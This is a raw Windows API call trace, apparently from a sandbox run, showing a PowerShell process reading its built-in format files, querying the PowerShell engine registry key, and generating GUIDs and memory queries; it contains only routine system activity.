	[0426.275] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.276] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.277] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0xbce, lpOverlapped=0x0) returned 1
	[0426.277] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d5ff96, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d5ff96*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0426.539] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d60008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2d60008*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0426.539] CloseHandle (hObject=0x1c4) returned 1
	[0426.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0426.539] SetErrorMode (uMode=0x1) returned 0x1
	[0426.539] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0426.539] SetErrorMode (uMode=0x1) returned 0x1
	[0426.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0426.540] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0426.540] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0426.540] CoTaskMemAlloc (cb=0x5a) returned 0x2a5400
	[0426.540] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x2a5400, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0426.540] CoTaskMemFree (pv=0x2a5400) 
	[0426.540] RegCloseKey (hKey=0x1c4) returned 0x0
	[0426.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0426.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0426.541] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xc7f42def, Data2=0x961e, Data3=0x48e1, Data4=([0]=0xac, [1]=0xbf, [2]=0xdc, [3]=0x18, [4]=0xb7, [5]=0x1f, [6]=0x8d, [7]=0x5f))) returned 0x0
	[0426.542] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xa4731bed, Data2=0x9a1, Data3=0x4718, Data4=([0]=0xb0, [1]=0xeb, [2]=0xaf, [3]=0xb7, [4]=0xb7, [5]=0x40, [6]=0xd0, [7]=0x8b))) returned 0x0
	[0426.543] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3cfa8701, Data2=0x5d32, Data3=0x440a, Data4=([0]=0x85, [1]=0xd9, [2]=0x3a, [3]=0x21, [4]=0xa4, [5]=0xd9, [6]=0x90, [7]=0x99))) returned 0x0
	[0426.543] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xda52000, Data2=0xcd3c, Data3=0x42f6, Data4=([0]=0x8f, [1]=0xcf, [2]=0xa4, [3]=0x68, [4]=0x55, [5]=0xe9, [6]=0xdb, [7]=0x5e))) returned 0x0
	[0426.544] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xd8de3d83, Data2=0x9e20, Data3=0x4343, Data4=([0]=0xa9, [1]=0xb6, [2]=0xcd, [3]=0x10, [4]=0x97, [5]=0xf2, [6]=0xcd, [7]=0x81))) returned 0x0
	[0426.544] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x7186f627, Data2=0xa149, Data3=0x43e3, Data4=([0]=0xa1, [1]=0xe6, [2]=0xda, [3]=0x19, [4]=0x6c, [5]=0x8b, [6]=0xcc, [7]=0xf))) returned 0x0
	[0426.544] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.545] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xafbe0d0, Data2=0x97fb, Data3=0x447d, Data4=([0]=0xb1, [1]=0xaa, [2]=0x20, [3]=0xe6, [4]=0x54, [5]=0xfd, [6]=0xdd, [7]=0x8b))) returned 0x0
	[0426.546] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.547] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.548] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xbf91cbec, Data2=0x311b, Data3=0x4f3b, Data4=([0]=0x9e, [1]=0x23, [2]=0x1, [3]=0xd6, [4]=0xc, [5]=0x8a, [6]=0xfe, [7]=0xb9))) returned 0x0
	[0426.548] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x49a78333, Data2=0x9828, Data3=0x428d, Data4=([0]=0x9d, [1]=0x60, [2]=0xed, [3]=0x92, [4]=0x3a, [5]=0xbb, [6]=0xfd, [7]=0xd1))) returned 0x0
	[0426.548] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x32a329d0, Data2=0x299c, Data3=0x438f, Data4=([0]=0xa1, [1]=0x5d, [2]=0x5c, [3]=0x1a, [4]=0x65, [5]=0x38, [6]=0x2b, [7]=0xf3))) returned 0x0
	[0426.548] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x78da72d1, Data2=0xa704, Data3=0x4350, Data4=([0]=0x85, [1]=0xb8, [2]=0xfd, [3]=0x5e, [4]=0xaf, [5]=0x75, [6]=0xd7, [7]=0x9a))) returned 0x0
	[0426.548] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.548] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x15cc07d3, Data2=0xa745, Data3=0x4661, Data4=([0]=0x82, [1]=0x2b, [2]=0xbc, [3]=0xca, [4]=0xaf, [5]=0x7, [6]=0x7a, [7]=0x9d))) returned 0x0
	[0426.548] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.548] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.548] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.549] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.549] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.549] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf60e4555, Data2=0x31c8, Data3=0x4992, Data4=([0]=0x91, [1]=0x71, [2]=0xe0, [3]=0xf6, [4]=0x56, [5]=0xb3, [6]=0x3f, [7]=0x1b))) returned 0x0
	[0426.549] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf11b5957, Data2=0xedd0, Data3=0x4f83, Data4=([0]=0xbc, [1]=0x88, [2]=0xa1, [3]=0x95, [4]=0x18, [5]=0x87, [6]=0x19, [7]=0x7c))) returned 0x0
	[0426.549] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xe3d2e81e, Data2=0xb68e, Data3=0x4241, Data4=([0]=0x9a, [1]=0x5, [2]=0xbd, [3]=0x6d, [4]=0x77, [5]=0x4d, [6]=0xee, [7]=0xc))) returned 0x0
	[0426.549] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3257b71a, Data2=0x8323, Data3=0x4a45, Data4=([0]=0xb6, [1]=0x24, [2]=0xb1, [3]=0xa7, [4]=0xe1, [5]=0x9e, [6]=0x7a, [7]=0x1f))) returned 0x0
	[0426.549] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xb5704fd3, Data2=0xe259, Data3=0x4e88, Data4=([0]=0xa6, [1]=0xf3, [2]=0x58, [3]=0xe8, [4]=0xd8, [5]=0x68, [6]=0x4d, [7]=0x37))) returned 0x0
	[0426.549] VirtualQuery (in: lpAddress=0x18c3a0, lpBuffer=0x18d260, dwLength=0x30 | out: lpBuffer=0x18d260*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x45e6490d, Data2=0x2ff8, Data3=0x4a3e, Data4=([0]=0x9c, [1]=0x39, [2]=0xf2, [3]=0xa0, [4]=0x77, [5]=0x44, [6]=0x79, [7]=0xcc))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9047a943, Data2=0xc8c5, Data3=0x4f1f, Data4=([0]=0x82, [1]=0x5d, [2]=0xeb, [3]=0x11, [4]=0x42, [5]=0x5f, [6]=0x9c, [7]=0xc2))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x4f328e4f, Data2=0xa928, Data3=0x4f13, Data4=([0]=0x84, [1]=0xb5, [2]=0xaa, [3]=0xcf, [4]=0x8a, [5]=0x9b, [6]=0x2d, [7]=0x15))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x64d3b1f7, Data2=0xef6c, Data3=0x48d0, Data4=([0]=0x97, [1]=0x86, [2]=0x39, [3]=0x3d, [4]=0x8b, [5]=0xfd, [6]=0x5a, [7]=0xcc))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xfefca1f4, Data2=0x4cee, Data3=0x4827, Data4=([0]=0x91, [1]=0x75, [2]=0xe, [3]=0x16, [4]=0xd9, [5]=0x41, [6]=0x90, [7]=0x3b))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x96976ff, Data2=0x962c, Data3=0x432f, Data4=([0]=0xb6, [1]=0x89, [2]=0x97, [3]=0x4f, [4]=0x44, [5]=0x99, [6]=0x8b, [7]=0x85))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x1e55297c, Data2=0x3b0f, Data3=0x4f88, Data4=([0]=0xae, [1]=0x74, [2]=0xc8, [3]=0x84, [4]=0xb6, [5]=0x27, [6]=0xab, [7]=0x90))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x58480d56, Data2=0xb22e, Data3=0x4590, Data4=([0]=0xb5, [1]=0x2e, [2]=0xd9, [3]=0xe4, [4]=0x4c, [5]=0x5, [6]=0x87, [7]=0xfe))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9e9d44, Data2=0x4652, Data3=0x4615, Data4=([0]=0xa2, [1]=0xae, [2]=0x9a, [3]=0x9, [4]=0x6, [5]=0xac, [6]=0xc1, [7]=0xc8))) returned 0x0
	[0426.550] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x971f0f0c, Data2=0x7ad9, Data3=0x4951, Data4=([0]=0xbf, [1]=0x33, [2]=0x76, [3]=0x60, [4]=0xa9, [5]=0x29, [6]=0xe4, [7]=0xf3))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xa6e482a5, Data2=0xf732, Data3=0x4340, Data4=([0]=0x9e, [1]=0xb2, [2]=0x93, [3]=0x1b, [4]=0xd6, [5]=0xa9, [6]=0x9a, [7]=0xa))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xfa4f4085, Data2=0x4278, Data3=0x4706, Data4=([0]=0x90, [1]=0x96, [2]=0x41, [3]=0xb3, [4]=0x49, [5]=0x80, [6]=0xfa, [7]=0xd8))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3b0ea14a, Data2=0x8e22, Data3=0x48ed, Data4=([0]=0xbc, [1]=0x22, [2]=0xcc, [3]=0xf6, [4]=0xb7, [5]=0xd1, [6]=0x23, [7]=0xc8))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xe1b51a23, Data2=0x37d3, Data3=0x45c7, Data4=([0]=0x9d, [1]=0xbc, [2]=0xd6, [3]=0xc5, [4]=0x1d, [5]=0xe9, [6]=0xd4, [7]=0x2a))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf405d6fc, Data2=0x6746, Data3=0x49bb, Data4=([0]=0x94, [1]=0x19, [2]=0x3, [3]=0xbf, [4]=0x9c, [5]=0x1f, [6]=0xb1, [7]=0x7f))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x77f15729, Data2=0x5f9a, Data3=0x49fb, Data4=([0]=0xba, [1]=0xb6, [2]=0x50, [3]=0x4c, [4]=0x7f, [5]=0xda, [6]=0xc7, [7]=0xcc))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x7febdd39, Data2=0xdd87, Data3=0x4dc7, Data4=([0]=0x92, [1]=0xdd, [2]=0x9b, [3]=0x3e, [4]=0x94, [5]=0xc8, [6]=0x9, [7]=0x92))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9f419ea6, Data2=0x22be, Data3=0x4acc, Data4=([0]=0x87, [1]=0x26, [2]=0x5c, [3]=0x39, [4]=0xb2, [5]=0x99, [6]=0x47, [7]=0x51))) returned 0x0
	[0426.551] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x86009bc9, Data2=0xad1b, Data3=0x4c00, Data4=([0]=0xb4, [1]=0x31, [2]=0xcb, [3]=0x55, [4]=0x81, [5]=0x29, [6]=0xec, [7]=0x7c))) returned 0x0
	[0426.551] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.552] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.552] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.552] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x77e38091, Data2=0xd9b1, Data3=0x4887, Data4=([0]=0x9b, [1]=0x92, [2]=0x7f, [3]=0xf3, [4]=0x21, [5]=0x11, [6]=0x91, [7]=0x3))) returned 0x0
	[0426.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0426.552] SetErrorMode (uMode=0x1) returned 0x1
	[0426.553] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0426.553] GetFileType (hFile=0x1c4) returned 0x1
	[0426.553] SetErrorMode (uMode=0x1) returned 0x1
	[0426.553] GetFileType (hFile=0x1c4) returned 0x1
	[0426.553] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.554] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.554] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.554] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.554] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.555] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.555] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x119, lpOverlapped=0x0) returned 1
	[0426.555] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e6d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2e6d270*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0426.555] CloseHandle (hObject=0x1c4) returned 1
	[0426.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0426.555] SetErrorMode (uMode=0x1) returned 0x1
	[0426.555] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0426.555] SetErrorMode (uMode=0x1) returned 0x1
	[0426.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0426.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0426.556] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0426.556] CoTaskMemAlloc (cb=0x5a) returned 0x2a5400
	[0426.556] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x2a5400, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0426.556] CoTaskMemFree (pv=0x2a5400) 
	[0426.556] RegCloseKey (hKey=0x1c4) returned 0x0
	[0426.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0426.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0426.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.557] VirtualQuery (in: lpAddress=0x18bfa0, lpBuffer=0x18ce60, dwLength=0x30 | out: lpBuffer=0x18ce60*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.557] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xbb009a59, Data2=0xf293, Data3=0x40e7, Data4=([0]=0xaa, [1]=0xe, [2]=0x7d, [3]=0x3c, [4]=0xf2, [5]=0xcf, [6]=0xcd, [7]=0x8a))) returned 0x0
